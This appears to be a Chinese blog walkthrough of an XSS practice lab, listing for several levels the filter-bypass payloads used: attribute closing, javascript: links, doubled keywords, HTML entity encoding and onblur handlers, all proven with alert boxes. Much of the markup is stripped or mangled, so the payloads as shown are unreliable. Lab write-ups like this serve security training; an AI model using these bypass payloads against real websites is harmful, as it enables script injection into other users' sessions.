xss 通过秘籍

终极测试代码

IPT>OonN'"\/(hrHRefEF)IPT>

第一关(没有任何过滤)

使用终极测试代码,查看源码

发现没有任何过滤,直接使用javascrupt中的alert弹框

xss 通过秘籍_第1张图片

第二关(闭合方式)

先用终极测试代码,查看源码

我们要先闭合前面,然后注释掉后面

">//">

">ipt>"

过滤了大小写,script,on.
javascript 伪协议   a标签要独立运行,所以要闭合前面的标签
value=" ">click me "

">click me

xss 通过秘籍_第5张图片

第六关(过滤了on)

先用终极测试代码,查看源码

value="IPT>Oo_nN'"\/(hrHRefEF)IPT>"
过滤了on,
value="">click me"

">click me

xss 通过秘籍_第6张图片

第七关(过滤)

我们用第六关的代码试试

click me">

发现href和script被过滤了,我们可以试试双写

">alert(/xss/)">

">alert(/xss/)

xss 通过秘籍_第7张图片

第八关(html编码)

先用终极测试代码,查看源码

value="<scr<script>ipt>oonn'"\/(hrhrefef)</scr</script>ipt>">
发现过滤了大小写,< .

所以使用html实体编码。 

javascript:alert('wj')

javascript:al
ert('wj')

xss 通过秘籍_第8张图片

第九关(格式http://)

使用第八关方式,发现代码不合法。需要使用http://.

xss 通过秘籍_第9张图片

javascript:a
lert('wj')//http://

xss 通过秘籍_第10张图片

第十关(搜索框被隐藏)

发现没有搜索框,查看源码

发现是使用了hidden,隐藏了

我们可以修改他,让hidden失去作用
οnblur= 'alert(/xss/)' >type="hidden">

onblur='alert(/1/)'>

xss 通过秘籍_第11张图片

你可能感兴趣的:(xss跨站脚本,网络安全)